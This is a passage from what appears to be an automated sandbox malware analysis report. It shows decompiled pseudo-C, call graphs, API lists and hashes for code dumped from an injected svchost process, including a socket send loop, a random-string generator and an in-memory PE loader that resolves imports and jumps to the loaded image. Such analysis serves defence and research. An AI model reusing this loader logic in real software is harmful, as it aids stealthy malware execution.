                                                                                                                                                                                                                                                                      0x040018fe
                                                                                                                                                                                                                                                                      0x04001903
                                                                                                                                                                                                                                                                      0x04001906
                                                                                                                                                                                                                                                                      0x04001912
                                                                                                                                                                                                                                                                      0x04001931
                                                                                                                                                                                                                                                                      0x0400193f
                                                                                                                                                                                                                                                                      0x04001948
                                                                                                                                                                                                                                                                      0x04001963
                                                                                                                                                                                                                                                                      0x04001963
                                                                                                                                                                                                                                                                      0x040018a6
                                                                                                                                                                                                                                                                      0x040018a6
                                                                                                                                                                                                                                                                      0x04001976
                                                                                                                                                                                                                                                                      0x04001981
                                                                                                                                                                                                                                                                      0x0400199b
                                                                                                                                                                                                                                                                      0x040019a2
                                                                                                                                                                                                                                                                      0x040019a2
                                                                                                                                                                                                                                                                      0x040017c8

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 04001490: lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                                        • Part of subcall function 04001490: GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                                        • Part of subcall function 04001490: closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040017E6
                                                                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 0400188B
                                                                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 04001963
                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04001976
                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00009C40), ref: 04001981
                                                                                                                                                                                                                                                                        • Part of subcall function 04001DC0: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 04001E14
                                                                                                                                                                                                                                                                        • Part of subcall function 04001470: GetProcessHeap.KERNEL32(00000008,?), ref: 04001479
                                                                                                                                                                                                                                                                        • Part of subcall function 04001470: RtlAllocateHeap.NTDLL(00000000), ref: 04001480
                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 04001990
                                                                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 0400199B
                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 040019A2
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Create$HeapProcessSleepThread$AllocAllocateCleanupCountEventExitObjectSingleTickVirtualWaitclosesocketlstrcat
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3000315311-0
                                                                                                                                                                                                                                                                      • Opcode ID: ed75c3485ee5f6438b7b72692c8e44a361812d41e5d2ef45d7a2c52b189860e4
                                                                                                                                                                                                                                                                      • Instruction ID: ecbd1e530684247b239ee6e1b256228db756e23c6e027602103708aff6be2e82
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed75c3485ee5f6438b7b72692c8e44a361812d41e5d2ef45d7a2c52b189860e4
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84410674A012289FFB60DF14DC95BDAB7B0AB4A708F1480E8E5497B2C4D7756E80CF46
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 313 40010e0-40010ea 314 40010f2-40010f4 313->314 315 40010ec-40010f0 313->315 317 400114d-4001150 314->317 315->314 316 40010f6 315->316 318 40010fd-4001101 316->318 319 4001103-4001120 send 318->319 320 400113a-400114b send 318->320 321 4001122-4001124 319->321 322 4001126-4001138 319->322 320->317 321->317 322->318
                                                                                                                                                                                                                                                                      C-Code - Quality: 54%
                                                                                                                                                                                                                                                                      			E040010E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				intOrPtr _t22;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				if(_a8 == 0 || _a12 < 0) {
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                                                                                      					while(_a12 != 0) {
                                                                                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                                                                                      						_t22 = _a12;
                                                                                                                                                                                                                                                                      						_push(_t22);
                                                                                                                                                                                                                                                                      						_push(_a8 + _v8);
                                                                                                                                                                                                                                                                      						_push(_a4); // executed
                                                                                                                                                                                                                                                                      						L04001012(); // executed
                                                                                                                                                                                                                                                                      						_v12 = _t22;
                                                                                                                                                                                                                                                                      						if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                      							_v8 = _v8 + _v12;
                                                                                                                                                                                                                                                                      							_a12 = _a12 - _v12;
                                                                                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                                                                                      					_push(_a8);
                                                                                                                                                                                                                                                                      					_push(_a4); // executed
                                                                                                                                                                                                                                                                      					L04001012(); // executed
                                                                                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}






                                                                                                                                                                                                                                                                      0x040010ea
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040010f6
                                                                                                                                                                                                                                                                      0x040010f6
                                                                                                                                                                                                                                                                      0x040010fd
                                                                                                                                                                                                                                                                      0x04001103
                                                                                                                                                                                                                                                                      0x04001105
                                                                                                                                                                                                                                                                      0x04001108
                                                                                                                                                                                                                                                                      0x0400110f
                                                                                                                                                                                                                                                                      0x04001113
                                                                                                                                                                                                                                                                      0x04001114
                                                                                                                                                                                                                                                                      0x04001119
                                                                                                                                                                                                                                                                      0x04001120
                                                                                                                                                                                                                                                                      0x0400112c
                                                                                                                                                                                                                                                                      0x04001135
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001135
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001122
                                                                                                                                                                                                                                                                      0x0400113a
                                                                                                                                                                                                                                                                      0x0400113c
                                                                                                                                                                                                                                                                      0x04001141
                                                                                                                                                                                                                                                                      0x04001145
                                                                                                                                                                                                                                                                      0x04001146
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400114b

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • send.WS2_32(?,00000000,?,00000000), ref: 04001114
                                                                                                                                                                                                                                                                      • send.WS2_32(?,00000000,00000000,00000000), ref: 04001146
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: send
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2809346765-0
                                                                                                                                                                                                                                                                      • Opcode ID: b2e598ef71c8ac5d0c56a500729e24b321e62eb8f582e8b020920d41a4434bf5
                                                                                                                                                                                                                                                                      • Instruction ID: 7140d396e4fa338b1c45032ebff5f33e510887e1da457bfc48643044175dbf3e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2e598ef71c8ac5d0c56a500729e24b321e62eb8f582e8b020920d41a4434bf5
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80012234A00348FBEF14CFA8D845BEE77B4AB44318F10C658E9656B2C0D7B6A651EB91
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 323 40013b0-40013c1 324 4001421-4001427 323->324 325 40013c3-40013c7 323->325 325->324 326 40013c9-40013d0 325->326 327 40013db-40013e1 326->327 328 4001411-400141a 327->328 329 40013e3-400140f QueryPerformanceCounter Sleep 327->329 328->324 330 40013d2-40013d8 329->330 330->327
                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E040013B0(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                      				long _v8;
                                                                                                                                                                                                                                                                      				long _v12;
                                                                                                                                                                                                                                                                      				union _LARGE_INTEGER _v20;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                                      					_v12 = 0;
                                                                                                                                                                                                                                                                      					while(_v12 < _a8) {
                                                                                                                                                                                                                                                                      						QueryPerformanceCounter( &_v20);
                                                                                                                                                                                                                                                                      						Sleep(0); // executed
                                                                                                                                                                                                                                                                      						_t17 = _v20.LowPart % 0x3d + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz1234567890"; // 0x44434241
                                                                                                                                                                                                                                                                      						 *((char*)(_a4 + _v12)) =  *_t17;
                                                                                                                                                                                                                                                                      						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *((char*)(_a4 + _a8)) = 0;
                                                                                                                                                                                                                                                                      					_v8 = 1;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _v8;
                                                                                                                                                                                                                                                                      			}






                                                                                                                                                                                                                                                                      0x040013b6
                                                                                                                                                                                                                                                                      0x040013c1
                                                                                                                                                                                                                                                                      0x040013c9
                                                                                                                                                                                                                                                                      0x040013db
                                                                                                                                                                                                                                                                      0x040013e7
                                                                                                                                                                                                                                                                      0x040013ef
                                                                                                                                                                                                                                                                      0x04001407
                                                                                                                                                                                                                                                                      0x0400140d
                                                                                                                                                                                                                                                                      0x040013d8
                                                                                                                                                                                                                                                                      0x040013d8
                                                                                                                                                                                                                                                                      0x04001417
                                                                                                                                                                                                                                                                      0x0400141a
                                                                                                                                                                                                                                                                      0x0400141a
                                                                                                                                                                                                                                                                      0x04001427

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                                      • Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                      • Opcode ID: a7db8480fdc823d777aef3822c45b88b551d9c425098c02d9d2f571069091408
                                                                                                                                                                                                                                                                      • Instruction ID: 9d74403c1c2c7bb1751bbbba9dc0b5917814bf527727232baae25755bbc2d242
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7db8480fdc823d777aef3822c45b88b551d9c425098c02d9d2f571069091408
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18011A30904208EBEB01CF98D494BEDBBB1FF44308F14C098E9496B381D379AA84CB81
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 331 4011cd-4011e4 332 401253-401255 331->332 333 4011e6-4011e9 331->333 334 4011ea-4011ef 333->334 335 4011f1-401204 LoadLibraryExA 334->335 336 40124a-40124f 334->336 335->332 337 401206-40120d 335->337 336->332 338 401212-401218 337->338 339 40120f 337->339 340 40121b-40121f 338->340 339->338 341 401221-401224 340->341 342 401226-40122b 340->342 341->334 343 401235 342->343 344 40122d-401233 342->344 345 40123a-401248 343->345 344->345 345->340
                                                                                                                                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                                                                                                                                      			E004011CD(intOrPtr _a4, intOrPtr _a8, signed int _a16) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed int _t22;
                                                                                                                                                                                                                                                                      				intOrPtr _t23;
                                                                                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                                                                                      				intOrPtr* _t34;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				asm("pushad");
                                                                                                                                                                                                                                                                      				_t33 =  *((intOrPtr*)(_a4 +  *((intOrPtr*)(_a4 + 0x3c)) + 0x80));
                                                                                                                                                                                                                                                                      				if(_t33 != 0) {
                                                                                                                                                                                                                                                                      					_t34 = _t33 + _a4;
                                                                                                                                                                                                                                                                      					asm("cld");
                                                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                                                      						_t23 =  *((intOrPtr*)(_t34 + 0xc));
                                                                                                                                                                                                                                                                      						if(_t23 == 0) {
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t22 = LoadLibraryExA(_t23 + _a4, 0, 0);
                                                                                                                                                                                                                                                                      						if(_t22 != 0) {
                                                                                                                                                                                                                                                                      							_v8 = _t22;
                                                                                                                                                                                                                                                                      							if( *_t34 == 0) {
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                                                                                                      								asm("lodsd");
                                                                                                                                                                                                                                                                      								if(_t22 == 0) {
                                                                                                                                                                                                                                                                      									break;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								if((_t22 & 0x80000000) != 0) {
                                                                                                                                                                                                                                                                      									_t26 = _t22 & 0x0000ffff;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_t26 = _t22 + _a4 + 2;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t22 =  *((intOrPtr*)(_a8 + 0x29af9))(_v8, _t26);
                                                                                                                                                                                                                                                                      								asm("stosd");
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t34 = _t34 + 0x14;
                                                                                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t22 = 1;
                                                                                                                                                                                                                                                                      					_a16 = 1;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				L14:
                                                                                                                                                                                                                                                                      				asm("popad");
                                                                                                                                                                                                                                                                      				return _t22;
                                                                                                                                                                                                                                                                      			}









                                                                                                                                                                                                                                                                      0x004011d3
                                                                                                                                                                                                                                                                      0x004011e0
                                                                                                                                                                                                                                                                      0x004011e4
                                                                                                                                                                                                                                                                      0x004011e6
                                                                                                                                                                                                                                                                      0x004011e9
                                                                                                                                                                                                                                                                      0x004011ea
                                                                                                                                                                                                                                                                      0x004011ea
                                                                                                                                                                                                                                                                      0x004011ef
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x004011fc
                                                                                                                                                                                                                                                                      0x00401204
                                                                                                                                                                                                                                                                      0x00401206
                                                                                                                                                                                                                                                                      0x0040120d
                                                                                                                                                                                                                                                                      0x0040120d
                                                                                                                                                                                                                                                                      0x0040121b
                                                                                                                                                                                                                                                                      0x0040121b
                                                                                                                                                                                                                                                                      0x0040121f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0040122b
                                                                                                                                                                                                                                                                      0x00401235
                                                                                                                                                                                                                                                                      0x0040122d
                                                                                                                                                                                                                                                                      0x00401230
                                                                                                                                                                                                                                                                      0x00401230
                                                                                                                                                                                                                                                                      0x00401241
                                                                                                                                                                                                                                                                      0x00401247
                                                                                                                                                                                                                                                                      0x00401247
                                                                                                                                                                                                                                                                      0x00401221
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00401221
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00401204
                                                                                                                                                                                                                                                                      0x0040124a
                                                                                                                                                                                                                                                                      0x0040124f
                                                                                                                                                                                                                                                                      0x0040124f
                                                                                                                                                                                                                                                                      0x00401253
                                                                                                                                                                                                                                                                      0x00401253
                                                                                                                                                                                                                                                                      0x00401255

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 004011FC
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.814621804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                      • Opcode ID: 1d8c67a6fd8a031ce9178923ff6fa604b01da3edc277bbd736844eb450087ab7
                                                                                                                                                                                                                                                                      • Instruction ID: 35013e2e2bdfb2c25cf3a4b33a37da36620c85c937569e224cb1d264aff8bf43
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d8c67a6fd8a031ce9178923ff6fa604b01da3edc277bbd736844eb450087ab7
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5114872944205AFDF10CF44C8C0B9A37A4AF15354F2981B9EC19FB3A2D374EE148B99
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 30%
                                                                                                                                                                                                                                                                      			E00401126(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                                                                                                      				void* _t55;
                                                                                                                                                                                                                                                                      				void* _t57;
                                                                                                                                                                                                                                                                      				void* _t61;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				asm("pushad");
                                                                                                                                                                                                                                                                      				_t55 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                      				_t27 = VirtualAlloc( *(_t55 + 0x34),  *(_t55 + 0x50), 0x3000, 0x40);
                                                                                                                                                                                                                                                                      				if(_t27 != 0) {
                                                                                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                                                                                      					_v8 = _t27;
                                                                                                                                                                                                                                                                      					asm("cld");
                                                                                                                                                                                                                                                                      					memcpy(_v8, _a4,  *(_t55 + 0x54));
                                                                                                                                                                                                                                                                      					_t57 = _t55;
                                                                                                                                                                                                                                                                      					_push(_t57);
                                                                                                                                                                                                                                                                      					_t58 = _t57 + 0xf8;
                                                                                                                                                                                                                                                                      					asm("pushad");
                                                                                                                                                                                                                                                                      					asm("cld");
                                                                                                                                                                                                                                                                      					memcpy(_v8 +  *((intOrPtr*)(_t57 + 0x104)), _a4 +  *((intOrPtr*)(_t57 + 0x10c)),  *(_t58 + 0x10));
                                                                                                                                                                                                                                                                      					asm("popad");
                                                                                                                                                                                                                                                                      					asm("loop 0xffffffe5");
                                                                                                                                                                                                                                                                      					_pop(_t61);
                                                                                                                                                                                                                                                                      					E004011CD(_v8, _a8); // executed
                                                                                                                                                                                                                                                                      					E00401258();
                                                                                                                                                                                                                                                                      					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x28)) + _v8))(_v8); // executed
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t27 =  *((intOrPtr*)(_a8 + 0x29afd))(0,  *(_t55 + 0x50), 0x3000, 0x40);
                                                                                                                                                                                                                                                                      					if(_t27 != 0) {
                                                                                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				asm("popad");
                                                                                                                                                                                                                                                                      				return _t37;
                                                                                                                                                                                                                                                                      			}









                                                                                                                                                                                                                                                                      0x0040112c
                                                                                                                                                                                                                                                                      0x00401130
                                                                                                                                                                                                                                                                      0x00401144
                                                                                                                                                                                                                                                                      0x0040114c
                                                                                                                                                                                                                                                                      0x0040116b
                                                                                                                                                                                                                                                                      0x0040116b
                                                                                                                                                                                                                                                                      0x0040116e
                                                                                                                                                                                                                                                                      0x0040117b
                                                                                                                                                                                                                                                                      0x0040117d
                                                                                                                                                                                                                                                                      0x0040117e
                                                                                                                                                                                                                                                                      0x00401185
                                                                                                                                                                                                                                                                      0x00401197
                                                                                                                                                                                                                                                                      0x0040119f
                                                                                                                                                                                                                                                                      0x004011a0
                                                                                                                                                                                                                                                                      0x004011a2
                                                                                                                                                                                                                                                                      0x004011a6
                                                                                                                                                                                                                                                                      0x004011a8
                                                                                                                                                                                                                                                                      0x004011af
                                                                                                                                                                                                                                                                      0x004011b7
                                                                                                                                                                                                                                                                      0x004011c6
                                                                                                                                                                                                                                                                      0x0040114e
                                                                                                                                                                                                                                                                      0x00401163
                                                                                                                                                                                                                                                                      0x00401167
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00401169
                                                                                                                                                                                                                                                                      0x00401167
                                                                                                                                                                                                                                                                      0x004011c8
                                                                                                                                                                                                                                                                      0x004011ca

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00401144
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.814621804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                      • Opcode ID: f46dcd975488781c9cddb351eca70577c1689cc1756a23961b888947e9d6707a
                                                                                                                                                                                                                                                                      • Instruction ID: 6f389262607e94f6ca6fd2432eff30f66c048e0178ed9f8f27be01fdfe11bbb9
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f46dcd975488781c9cddb351eca70577c1689cc1756a23961b888947e9d6707a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02115E32600615ABCB21DF64CD81B8BB7F4AF09324F144469AA1ABB691D771FA00DB88
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E04016CD0(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v8 = _a8;
                                                                                                                                                                                                                                                                      				_v12 = _a12;
                                                                                                                                                                                                                                                                      				_t117 = _v12;
                                                                                                                                                                                                                                                                      				E04007010(__edi, _v8, 0, _v12);
                                                                                                                                                                                                                                                                      				if(_a4 != 1) {
                                                                                                                                                                                                                                                                      					if(_a4 != 0) {
                                                                                                                                                                                                                                                                      						if(_a4 != 2) {
                                                                                                                                                                                                                                                                      							if(_a4 != 3) {
                                                                                                                                                                                                                                                                      								if(_a4 != 4) {
                                                                                                                                                                                                                                                                      									if(_a4 != 5) {
                                                                                                                                                                                                                                                                      										if(_a4 != 6) {
                                                                                                                                                                                                                                                                      											if(_a4 != 7) {
                                                                                                                                                                                                                                                                      												if(_a4 != 8) {
                                                                                                                                                                                                                                                                      													if(_a4 != 0x10) {
                                                                                                                                                                                                                                                                      														if(_a4 != 9) {
                                                                                                                                                                                                                                                                      															if(_a4 != 0xa) {
                                                                                                                                                                                                                                                                      																if(_a4 != 0xb) {
                                                                                                                                                                                                                                                                      																	if(_a4 != 0xc) {
                                                                                                                                                                                                                                                                      																		if(_a4 != 0xd) {
                                                                                                                                                                                                                                                                      																			if(_a4 != 0xe) {
                                                                                                                                                                                                                                                                      																				if(_a4 != 0xf) {
                                                                                                                                                                                                                                                                      																					if(_a4 != 0x12) {
                                                                                                                                                                                                                                                                      																						if(_a4 != 0x11) {
                                                                                                                                                                                                                                                                      																							return E04008B48(_t117, _v8, _v12, 0x4273f8);
                                                                                                                                                                                                                                                                      																						}
                                                                                                                                                                                                                                                                      																						return E04008B48(_v8, _v8, _v12, 0x4273f0);
                                                                                                                                                                                                                                                                      																					}
                                                                                                                                                                                                                                                                      																					return E04008B48(_v12, _v8, _v12, 0x4273e8);
                                                                                                                                                                                                                                                                      																				}
                                                                                                                                                                                                                                                                      																				return E04008B48(_t117, _v8, _v12, 0x4273d8);
                                                                                                                                                                                                                                                                      																			}
                                                                                                                                                                                                                                                                      																			return E04008B48(_v8, _v8, _v12, 0x4273c8);
                                                                                                                                                                                                                                                                      																		}
                                                                                                                                                                                                                                                                      																		return E04008B48(_v12, _v8, _v12, 0x4273b4);
                                                                                                                                                                                                                                                                      																	}
                                                                                                                                                                                                                                                                      																	return E04008B48(_t117, _v8, _v12, 0x42739c);
                                                                                                                                                                                                                                                                      																}
                                                                                                                                                                                                                                                                      																return E04008B48(_v8, _v8, _v12, 0x427384);
                                                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                                                      															return E04008B48(_v12, _v8, _v12, 0x427374);
                                                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                                                      														return E04008B48(_t117, _v8, _v12, 0x42736c);
                                                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                                                      													return E04008B48(_v8, _v8, _v12, 0x427360);
                                                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                                                      												return E04008B48(_v12, _v8, _v12, 0x427358);
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											return E04008B48(_t117, _v8, _v12, 0x42734c);
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										return E04008B48(_v8, _v8, _v12, 0x427344);
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									return E04008B48(_v12, _v8, _v12, 0x427338);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								return E04008B48(_t117, _v8, _v12, 0x427328);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							return E04008B48(_v8, _v8, _v12, 0x42731c);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						return E04008B48(_v12, _v8, _v12, 0x427310);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					return E04008B48(_t117, _v8, _v12, 0x427300);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return E04008B48(_v8, _v8, _v12, 0x4272f4);
                                                                                                                                                                                                                                                                      			}





                                                                                                                                                                                                                                                                      0x04016cd9
                                                                                                                                                                                                                                                                      0x04016cdf
                                                                                                                                                                                                                                                                      0x04016ce2
                                                                                                                                                                                                                                                                      0x04016cec
                                                                                                                                                                                                                                                                      0x04016cf8
                                                                                                                                                                                                                                                                      0x04016d18
